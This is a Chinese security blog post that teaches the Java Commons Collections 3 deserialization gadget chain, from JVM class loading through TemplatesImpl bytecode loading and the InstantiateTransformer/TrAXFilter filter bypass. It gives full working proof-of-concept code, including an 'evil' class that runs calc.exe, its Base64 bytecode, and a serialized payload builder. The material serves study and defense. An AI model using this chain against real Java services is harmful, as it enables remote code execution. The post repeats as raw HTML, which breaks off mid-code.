JAVA安全-CommonsCollections 3

博主：辰兮吖
发布时间：2024 年 09 月 19 日
83 次浏览
暂无评论
14780字数
分类： WEB学习笔记

CommonsCollections 3

CC3是通过动态类加载机制来实现自动执行恶意类的代码，所以我们来看一下java的动态类加载机制：

动态类加载机制

Java 源代码被编译器编译成 .class 的字节码文件。然后由类加载器负责将这些 class 文件给加载到 JVM 中去执行。

JVM提供了三层类加载器

Bootstrap classLoader：启动类加载器，主要负责加载核心的类库(java.lang.*等)，构造 ExtClassLoader 和 APPClassLoader。
ExtClassLoader：拓展类加载器，主要负责加载 JAVA_HOME/lib/ext 目录下的一些扩展的 jar。
AppClassLoader：应用程序类加载器，主要负责加载应用程序的主函数类

加载类是把编译好的字节码.class文件（包括远程服务器或者本地的字节码文件或者是jar包里的）恢复成一个类。

首先是调用ClassLoader类中的loadClass方法，这个方法的作用是从已经加载的类缓存、父加载器等位置（双亲委派机制）去寻找类，在没有找到类的情况下，就会交给ClassLoader类的findClass方法；然后findClass方法就是根据基础路径的方式，可能会在本地文件系统、jar包或远程http服务器上读取字节码，然后将字节码交给ClassLoader类的defineClass，defineClass的作用就是处理前面传入的字节码，将其处理为真正的Java类；

双亲委派机制当一个Hello.class这样的文件要被加载时，不考虑我们自定义类加载器。首先会在 AppClassLoader 中检查是否加载过，如果有那就无需再加载了。如果没有，那么会拿到父加载器，然后调用父加载器的 loadClass 方法。父类中同理也会先检查自己是否已经加载过，如果没有再往上。注意这个类似递归的过程，直到到达 Bootstrap ClassLoader 之前，都是在检查是否加载过，并不会选择自己去加载。直到 Bootstrap ClassLoader ，已经没有父加载器了，这时候开始考虑自己是否能加载了，如果自己无法加载，会下沉到子加载器去加载，一直到最底层，如果没有任何加载器能加载，就会抛出 ClassNotFoundException。
优势：比如自己写的 String.class 不被加载，防止核心类被随意篡改(沙箱安全机制)。父类加载器已经加载了该类的时候就不需要子类加载器加载了（避免类的重复加载）

可以见得真正核心的部分其实是 defineClass ，他决定了如何将一段字节流转变成一个 Java 类，Java 默认的 ClassLoader#defineClass 是一个 native方法（Java调用非Java代码的接口），逻辑在 JVM 的C语言代码中。我们看看它是咋个加载的就行(defineClass这个方法是受保护的，用反射来获取到它)

import java.lang.reflect.Method;
import java.util.Base64;
 
public class HelloDefineClass {
    public static void main(String[] args) throws Exception {
        Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
        defineClass.setAccessible(true);
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQAGwoABgANCQAOAA8IABAKABEAEgcAEwcAFAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApTb3VyY2VGaWxlAQAKSGVsbG8uamF2YQwABwAIBwAVDAAWABcBAAtIZWxsbyBXb3JsZAcAGAwAGQAaAQAFSGVsbG8BABBqYXZhL2xhbmcvT2JqZWN0AQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAABAAEABwAIAAEACQAAAC0AAgABAAAADSq3AAGyAAISA7YABLEAAAABAAoAAAAOAAMAAAACAAQABAAMAAUAAQALAAAAAgAM");
        Class hello = (Class)defineClass.invoke(ClassLoader.getSystemClassLoader(), "Hello", code, 0, code.length);
        hello.newInstance();
    }
}

如果我们想通过加载类来实现任意代码执行，所以就要找到一个重写了 defineClass() 方法的类，它的链上的某个类里面要调用了 newInstance()方法，才能实现任意代码执行。因为defineClass方法作用域不开放，所以说很难直接利用它

PS:

ClassLoader是一个加载器，就是用来告诉JVM虚拟机如何去加载这个类，默认的就是根据类名来加载类，这个类名需要是完整路径，比如说java.lang.Runtime；而这里我们提到的URLClassLoader，是默认加载器AppClassLoader的父类，所以说这个的工作过程实际上就是在介绍默认的Java类加载器的工作流程

首先，java会根据基础路径去寻找class文件来加载，而这个基础路径有三种情况：

URL未以斜杠 / 结尾，则认为是一个JAR文件，使用 JarLoader来寻找类，即为在Jar包中寻找.class文件
URL以斜杠 / 结尾，且协议名是 file，则使用 FileLoader 来寻找类，即为在本地文件系统中寻找.class文件
URL以斜杠 / 结尾，且协议名不是file ，则使用最基础的Loader来寻找类

所以说咱可以以斜杠/结尾，但又不用file协议，而是使用http协议，这样就可以用Loader来寻找类了，例如：

import java.net.URL;
import java.net.URLClassLoader;
public class UrlLoaderTest
{
    public static void main( String[] args ) throws Exception
    {
        URL[] urls = {new URL("http://localhost:8000/")}; //里面有一个eviltest.class
        URLClassLoader loader = URLClassLoader.newInstance(urls);
        Class c = loader.loadClass("eviltest");
        c.newInstance();
    }
}

最后newInstance调用默认的无参构造方法创建对象。

利用TemplatesImpl加载字节码实现任意代码执行

在com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl这个类中定义了一个内部类TransletClassLoader，而在这个类中重写了defineClass方法，而且这个方法并没有显式地声明定义域，也就是说它是一种默认的类型，也就是default类型的，而默认类型的是可以被类外部调用的

static final class TransletClassLoader extends ClassLoader {
    // ...
    Class defineClass(final byte[] b) {
        return defineClass(null, b, 0, b.length);
    }
}

static final class TransletClassLoader extends ClassLoader {
    private final Map<String,Class> _loadedExternalExtensionFunctions;
    TransletClassLoader(ClassLoader parent) {
        super(parent);
        _loadedExternalExtensionFunctions = null;
}
    TransletClassLoader(ClassLoader parent,Map<String, Class> mapEF) {
        super(parent);
        _loadedExternalExtensionFunctions = mapEF;
}
    public Class<?> loadClass(String name) throws ClassNotFoundException {
        Class<?> ret = null;
        // The _loadedExternalExtensionFunctions will be empty when the SecurityManager is not set and the FSP is turned off
        if (_loadedExternalExtensionFunctions != null) {
            ret = _loadedExternalExtensionFunctions.get(name);
        }
        if (ret == null) {
            ret = super.loadClass(name);
            }
        return ret;
    }
/**
* Access to final protected superclass member from outer class.
*/
    Class defineClass(final byte[] b) {
        return defineClass(null, b, 0, b.length);
        }
}

因为TransletClassLoader是内部类，所以说只允许TemplatesImpl类中的方法调用，而TemplatesImpl类中的defineTransletClasses()方法调用了他，但它是一个private方法。通过for循环，依次加载字节码_bytecodes中的内容，然后赋值给Class数组_class：

private void defineTransletClasses()
        throws TransformerConfigurationException {

        if (_bytecodes == null) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
            throw new TransformerConfigurationException(err.toString());
        }

        TransletClassLoader loader = (TransletClassLoader)
            AccessController.doPrivileged(new PrivilegedAction() {
                public Object run() {
                    return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());
                }
            });

        try {
            final int classCount = _bytecodes.length;
            _class = new Class[classCount];

            if (classCount > 1) {
                _auxClasses = new HashMap<>();
            }

            for (int i = 0; i < classCount; i++) {
                _class[i] = loader.defineClass(_bytecodes[i]);//在这里调用了defineClass
                final Class superClass = _class[i].getSuperclass();

                // Check if this is the main class
                if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
                    _transletIndex = i;
                }
                else {
                    _auxClasses.put(_class[i].getName(), _class[i]);
                }
            }

            if (_transletIndex < 0) {
                ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);
                throw new TransformerConfigurationException(err.toString());
            }
        }
        catch (ClassFormatError e) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_CLASS_ERR, _name);
            throw new TransformerConfigurationException(err.toString());
        }
        catch (LinkageError e) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
            throw new TransformerConfigurationException(err.toString());
        }
    }

然后可以看到getTransletInstance()就调用了defineTransletClasses()。可以看到将字节码加载进来之后，会执行_class[_transletIndex].newInstance()，这里就会实例化类，执行任意代码了

private Translet getTransletInstance()
        throws TransformerConfigurationException {
        try {
            if (_name == null) return null;

            if (_class == null) defineTransletClasses();//此处调用defineTransletClasses方法

            // The translet needs to keep a reference to all its auxiliary class to prevent the GC from collecting them
            AbstractTranslet translet = (AbstractTranslet)
                    _class[_transletIndex].getConstructor().newInstance();
            translet.postInitialization();
            translet.setTemplates(this);
            translet.setOverrideDefaultParser(_overrideDefaultParser);
            translet.setAllowedProtocols(_accessExternalStylesheet);
            if (_auxClasses != null) {
                translet.setAuxiliaryClasses(_auxClasses);
            }

            return translet;
        }
        catch (InstantiationException | IllegalAccessException |
                NoSuchMethodException | InvocationTargetException e) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
            throw new TransformerConfigurationException(err.toString(), e);
        }
    }

也是一个private方法，再找找到了newTransformer()方法，终于是一个public方法了，可以直接调用：

public synchronized Transformer newTransformer()
        throws TransformerConfigurationException
    {
        TransformerImpl transformer;

        transformer = new TransformerImpl(getTransletInstance(), _outputProperties,
            _indentNumber, _tfactory);//调用了getTransletInstance方法

        if (_uriResolver != null) {
            transformer.setURIResolver(_uriResolver);
        }

        if (_tfactory.getFeature(XMLConstants.FEATURE_SECURE_PROCESSING)) {
            transformer.setSecureProcessing(true);
        }
        return transformer;
    }

整个链子：

TemplatesImpl#newTransformer() -> TemplatesImpl#getTransletInstance() -> TemplatesImpl#defineTransletClasses() -> TransletClassLoader#defineClass()

这里用反射设置TemplatesImpl对象的三个私有属性保证每步被正常调用到：

_bytecodes 是由字节码组成的数组；在defineTransletClasses()方法中if会判断传入的字节码的父类要是ABSTRACT_TRANSLET 也就是需要继承这个包com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet 所以我们还得构造一个特殊的类，用这个类生成字节码
_name 可以是任意字符串，只要不为 null 即可；
_tfactory 需要是一个TransformerFactoryImpl 对象；因为TemplatesImpl#defineTransletClasses() 方法里有调用到 _tfactory.getExternalExtensionsMap() 如果是null会出错

_bytecodes：

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class evil extends AbstractTranslet {
    public void transform(DOM document, SerializationHandler[] handlers)
        throws TransletException {}
    public void transform(DOM document, DTMAxisIterator iterator,
                          SerializationHandler handler) throws TransletException {}
    public evil() throws Exception{
        super();
        String[] command = {"calc.exe"};
        Runtime.getRuntime().exec(command);
    }
}

编译这个类得到字节码后就可以写一个简单的手动执行的POC了

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import java.lang.reflect.Field;
import java.util.Base64;
public class defineclass {
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
    public static void main(String[] args) throws Exception {
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIwoABwAUBwAVCAAWCgAXABgKABcAGQcAGgcAGwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAcAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgcAHQEAClNvdXJjZUZpbGUBAAlldmlsLmphdmEMAA8AEAEAEGphdmEvbGFuZy9TdHJpbmcBAAhjYWxjLmV4ZQcAHgwAHwAgDAAhACIBABN5c29zZXJpYWwvdGVzdC9ldmlsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAYABwAAAAAAAwABAAgACQACAAoAAAAZAAAAAwAAAAGxAAAAAQALAAAABgABAAAACwAMAAAABAABAA0AAQAIAA4AAgAKAAAAGQAAAAQAAAABsQAAAAEACwAAAAYAAQAAAA0ADAAAAAQAAQANAAEADwAQAAIACgAAADsABAACAAAAFyq3AAEEvQACWQMSA1NMuAAEK7YABVexAAAAAQALAAAAEgAEAAAADwAEABAADgARABYAEgAMAAAABAABABEAAQASAAAAAgAT");
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][] {code});
        setFieldValue(obj, "_name", "L1mbo");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
        obj.newTransformer();
    }
}

cc3

即使前面已经有了强大的cc6链，但现在很多过滤器都会过滤掉InvokerTransformer，这样之前的链子就打不通，所以得找个类代替它来绕过过滤，这个类就是org.apache.commons.collections.functors.InstantiateTransformer

InstantiateTransformer类也是实现了Transformer接口的一个类

public class InstantiateTransformer implements Transformer, Serializable {
    public Object transform(Object input) {
        try {
            if (!(input instanceof Class)) {
                throw new FunctorException("InstantiateTransformer: Input object was not an instanceof Class, it was a " + (input == null ? "null object" : input.getClass().getName()));
            } else {
                Constructor con = ((Class)input).getConstructor(this.iParamTypes);
                return con.newInstance(this.iArgs);
            }
        } catch (NoSuchMethodException var6) {
            throw new FunctorException("InstantiateTransformer: The constructor must exist and be public ");
        } catch (InstantiationException var7) {
            throw new FunctorException("InstantiateTransformer: InstantiationException", var7);
        } catch (IllegalAccessException var8) {
            throw new FunctorException("InstantiateTransformer: Constructor must be public", var8);
        } catch (InvocationTargetException var9) {
            throw new FunctorException("InstantiateTransformer: Constructor threw an exception", var9);
        }
    }
}

可以看出它可以调用指定类得构造方法，也就是找到一个构造方法调用TransformerImpl类中的newTransformer()方法的类

com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter这个类的构造方法中，就正好调用了(TransformerImpl) templates.newTransformer()，且前面的Templates对象可控，

public class TrAXFilter extends XMLFilterImpl {
    private Templates              _templates;
    private TransformerImpl        _transformer;
    private TransformerHandlerImpl _transformerHandler;
    private boolean _overrideDefaultParser;

    public TrAXFilter(Templates templates) throws TransformerConfigurationException
    {
        _templates = templates;
        _transformer = (TransformerImpl) templates.newTransformer();  // <--此处调用
        _transformerHandler = new TransformerHandlerImpl(_transformer);
        _overrideDefaultParser = _transformer.overrideDefaultParser();
    }
}

这样就能利用InstantiateTransformer的transform()来调用到TrAXFilter的构造方法，那么它就会自动调用templates.newTransformer()，就可以加载我们放在TemplatesImpl里面的字节码

所以Transformer数组就可以改写成

Transformer[] transformers = new Transformer[]{
    new ConstantTransformer(TrAXFilter.class),
    new InstantiateTransformer(new Class[] { Templates.class }, new Object[] { obj })
 };

POC

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;

import java.lang.reflect.Field;
import java.util.Base64;

public class CommonsCollections_3 {
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {
        Transformer[] faketransformers = new Transformer[]{new ConstantTransformer(1)};
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIwoABwAUBwAVCAAWCgAXABgKABcAGQcAGgcAGwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAcAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgcAHQEAClNvdXJjZUZpbGUBAAlldmlsLmphdmEMAA8AEAEAEGphdmEvbGFuZy9TdHJpbmcBAAhjYWxjLmV4ZQcAHgwAHwAgDAAhACIBABN5c29zZXJpYWwvdGVzdC9ldmlsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAYABwAAAAAAAwABAAgACQACAAoAAAAZAAAAAwAAAAGxAAAAAQALAAAABgABAAAACwAMAAAABAABAA0AAQAIAA4AAgAKAAAAGQAAAAQAAAABsQAAAAEACwAAAAYAAQAAAA0ADAAAAAQAAQANAAEADwAQAAIACgAAADsABAACAAAAFyq3AAEEvQACWQMSA1NMuAAEK7YABVexAAAAAQALAAAAEgAEAAAADwAEABAADgARABYAEgAMAAAABAABABEAAQASAAAAAgAT");
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{code});
        setFieldValue(obj, "_name", "L1mbo");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{obj})
        };
        Transformer transformersChain = new ChainedTransformer(faketransformers);

        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformersChain);

        TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");

        Map expMap = new HashMap();
        expMap.put(tme, "valuevalue");
        outerMap.remove("keykey");

        setFieldValue(transformersChain, "iTransformers", transformers);

        // ⽣成序列化字符串
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(expMap);
        oos.close();

        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object) ois.readObject();
    }
}

最后修改：2024 年 09 月 19 日

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

但行莫问前程
浏览次数: 14501
WEB基础漏洞笔记
浏览次数: 1212
Flask中pin码计算
浏览次数: 766
PHP GC回收机制（Garbage Collection）与Phar
浏览次数: 494
Python 原型链污染变体
浏览次数: 404

SQL注入-番外篇
浏览次数: 109
浅探CSP
浏览次数: 367
JAVA安全-CommonsCollections 2
浏览次数: 55
JAVA安全-CommonsCollections其他
浏览次数: 50
Phar反序列化奇淫
浏览次数: 290

JAVA安全-CommonsCollections 3

辰兮吖 • 2024 年 09 月 19 日

<h1>CommonsCollections 3</h1>CC3是通过动态类加载机制来实现自动执行恶意类的代码，所以我们来看一下java的动态类加载机制：<h2>动态类加载机制</h2>Java 源代码被编译器编译成 <code>.class</code> 的字节码文件。然后由类加载器负责将这些 class 文件给加载到 JVM 中去执行。JVM提供了三层类加载器<blockquote>Bootstrap classLoader：启动类加载器，主要负责加载核心的类库(java.lang.*等)，构造 ExtClassLoader 和 APPClassLoader。 ExtClassLoader：拓展类加载器，主要负责加载 JAVA_HOME/lib/ext 目录下的一些扩展的 jar。 AppClassLoader：应用程序类加载器，主要负责加载应用程序的主函数类</blockquote>加载类是把编译好的字节码<code>.class</code>文件（包括远程服务器或者本地的字节码文件或者是jar包里的）恢复成一个类。首先是调用<code>ClassLoader</code>类中的<code>loadClass</code>方法，这个方法的作用是从已经加载的类缓存、父加载器等位置（双亲委派机制）去寻找类，在没有找到类的情况下，就会交给<code>ClassLoader</code>类的<code>findClass</code>方法；然后<code>findClass</code>方法就是根据基础路径的方式，可能会在本地文件系统、jar包或远程http服务器上读取字节码，然后将字节码交给<code>ClassLoader</code>类的<code>defineClass</code>，<code>defineClass</code>的作用就是处理前面传入的字节码，将其处理为真正的Java类；<blockquote>双亲委派机制 当一个Hello.class这样的文件要被加载时，不考虑我们自定义类加载器。首先会在 AppClassLoader 中检查是否加载过，如果有那就无需再加载了。如果没有，那么会拿到父加载器，然后调用父加载器的 loadClass 方法。父类中同理也会先检查自己是否已经加载过，如果没有再往上。注意这个类似递归的过程，直到到达 Bootstrap ClassLoader 之前，都是在检查是否加载过，并不会选择自己去加载。直到 Bootstrap ClassLoader ，已经没有父加载器了，这时候开始考虑自己是否能加载了，如果自己无法加载，会下沉到子加载器去加载，一直到最底层，如果没有任何加载器能加载，就会抛出 ClassNotFoundException。 优势： 比如自己写的 String.class 不被加载，防止核心类被随意篡改(沙箱安全机制)。父类加载器已经加载了该类的时候就不需要子类加载器加载了（避免类的重复加载）</blockquote>可以见得真正核心的部分其实是 <code>defineClass</code> ，他决定了如何将一段字节流转变成一个 Java 类，Java 默认的 <code>ClassLoader#defineClass</code> 是一个 native方法（Java调用非Java代码的接口），逻辑在 JVM 的C语言代码中。我们看看它是咋个加载的就行(<code>defineClass</code>这个方法是受保护的，用反射来获取到它)<pre><code class="lang-java">import java.lang.reflect.Method;
import java.util.Base64;
 
public class HelloDefineClass {
 public static void main(String[] args) throws Exception {
 Method defineClass = ClassLoader.class.getDeclaredMethod(&quot;defineClass&quot;, String.class, byte[].class, int.class, int.class);
 defineClass.setAccessible(true);
 byte[] code = Base64.getDecoder().decode(&quot;yv66vgAAADQAGwoABgANCQAOAA8IABAKABEAEgcAEwcAFAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApTb3VyY2VGaWxlAQAKSGVsbG8uamF2YQwABwAIBwAVDAAWABcBAAtIZWxsbyBXb3JsZAcAGAwAGQAaAQAFSGVsbG8BABBqYXZhL2xhbmcvT2JqZWN0AQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAABAAEABwAIAAEACQAAAC0AAgABAAAADSq3AAGyAAISA7YABLEAAAABAAoAAAAOAAMAAAACAAQABAAMAAUAAQALAAAAAgAM&quot;);
 Class hello = (Class)defineClass.invoke(ClassLoader.getSystemClassLoader(), &quot;Hello&quot;, code, 0, code.length);
 hello.newInstance();
 }
}</code></pre>如果我们想通过加载类来实现任意代码执行，所以就要找到一个重写了 <code>defineClass()</code> 方法的类，它的链上的某个类里面要调用了 <code>newInstance()</code>方法，才能实现任意代码执行。因为<code>defineClass</code>方法作用域不开放，所以说很难直接利用它PS:<code>ClassLoader</code>是一个加载器，就是用来告诉JVM虚拟机如何去加载这个类，默认的就是根据类名来加载类，这个类名需要是完整路径，比如说<code>java.lang.Runtime</code>；而这里我们提到的<code>URLClassLoader</code>，是默认加载器<code>AppClassLoader</code>的父类，所以说这个的工作过程实际上就是在介绍默认的Java类加载器的工作流程首先，java会根据基础路径去寻找<code>class</code>文件来加载，而这个基础路径有三种情况：<ul><li>URL未以斜杠 / 结尾，则认为是一个JAR文件，使用 JarLoader来寻找类，即为在Jar包中寻找.class文件</li><li>URL以斜杠 / 结尾，且协议名是 file，则使用 FileLoader 来寻找类，即为在本地文件系统中寻找.class文件</li><li>URL以斜杠 / 结尾，且协议名不是file ，则使用最基础的Loader来寻找类</li></ul>所以说咱可以以斜杠<code>/</code>结尾，但又不用file协议，而是使用http协议，这样就可以用<code>Loader</code>来寻找类了，例如：<pre><code class="lang-java">import java.net.URL;
import java.net.URLClassLoader;
public class UrlLoaderTest
{
 public static void main( String[] args ) throws Exception
 {
 URL[] urls = {new URL(&quot;http://localhost:8000/&quot;)}; //里面有一个eviltest.class
 URLClassLoader loader = URLClassLoader.newInstance(urls);
 Class c = loader.loadClass(&quot;eviltest&quot;);
 c.newInstance();
 }
}</code></pre>最后<code>newInstance</code>调用默认的无参构造方法创建对象。<h3>利用TemplatesImpl加载字节码实现任意代码执行</h3>在<code>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</code>这个类中定义了一个内部类<code>TransletClassLoader</code>，而在这个类中重写了<code>defineClass</code>方法，而且这个方法并没有显式地声明定义域，也就是说它是一种默认的类型，也就是<code>default</code>类型的，而默认类型的是可以被类外部调用的<pre><code class="lang-java">static final class TransletClassLoader extends ClassLoader {
 // ...
 Class defineClass(final byte[] b) {
 return defineClass(null, b, 0, b.length);
 }
}</code></pre><pre><code class="lang-java">static final class TransletClassLoader extends ClassLoader {
 private final Map&lt;String,Class&gt; _loadedExternalExtensionFunctions;
 TransletClassLoader(ClassLoader parent) {
 super(parent);
 _loadedExternalExtensionFunctions = null;
}
 TransletClassLoader(ClassLoader parent,Map&lt;String, Class&gt; mapEF) {
 super(parent);
 _loadedExternalExtensionFunctions = mapEF;
}
 public Class&lt;?&gt; loadClass(String name) throws ClassNotFoundException {
 Class&lt;?&gt; ret = null;
 // The _loadedExternalExtensionFunctions will be empty when the SecurityManager is not set and the FSP is turned off
 if (_loadedExternalExtensionFunctions != null) {
 ret = _loadedExternalExtensionFunctions.get(name);
 }
 if (ret == null) {
 ret = super.loadClass(name);
 }
 return ret;
 }
/**
* Access to final protected superclass member from outer class.
*/
 Class defineClass(final byte[] b) {
 return defineClass(null, b, 0, b.length);
 }
}</code></pre>因为<code>TransletClassLoader</code>是内部类，所以说只允许<code>TemplatesImpl</code>类中的方法调用，而<code>TemplatesImpl</code>类中的<code>defineTransletClasses()</code>方法调用了他，但它是一个<code>private</code>方法。通过<code>for</code>循环，依次加载字节码<code>_bytecodes</code>中的内容，然后赋值给Class数组<code>_class</code>：<pre><code class="lang-java">private void defineTransletClasses()
 throws TransformerConfigurationException {

if (_bytecodes == null) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
            throw new TransformerConfigurationException(err.toString());
        }

TransletClassLoader loader = (TransletClassLoader)
            AccessController.doPrivileged(new PrivilegedAction() {
                public Object run() {
                    return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());
                }
            });

try {
            final int classCount = _bytecodes.length;
            _class = new Class[classCount];

if (classCount &gt; 1) {
                _auxClasses = new HashMap&lt;&gt;();
            }

for (int i = 0; i &lt; classCount; i++) {
                _class[i] = loader.defineClass(_bytecodes[i]);//在这里调用了defineClass
                final Class superClass = _class[i].getSuperclass();

// Check if this is the main class
                if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
                    _transletIndex = i;
                }
                else {
                    _auxClasses.put(_class[i].getName(), _class[i]);
                }
            }

if (_transletIndex &lt; 0) {
 ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);
 throw new TransformerConfigurationException(err.toString());
 }
 }
 catch (ClassFormatError e) {
 ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_CLASS_ERR, _name);
 throw new TransformerConfigurationException(err.toString());
 }
 catch (LinkageError e) {
 ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
 throw new TransformerConfigurationException(err.toString());
 }
 }</code></pre>然后可以看到<code>getTransletInstance()</code>就调用了<code>defineTransletClasses()</code>。可以看到将字节码加载进来之后，会执行<code>_class[_transletIndex].newInstance()</code>，这里就会实例化类，执行任意代码了<pre><code class="lang-java">private Translet getTransletInstance()
 throws TransformerConfigurationException {
 try {
 if (_name == null) return null;

if (_class == null) defineTransletClasses();//此处调用defineTransletClasses方法

// The translet needs to keep a reference to all its auxiliary class to prevent the GC from collecting them
            AbstractTranslet translet = (AbstractTranslet)
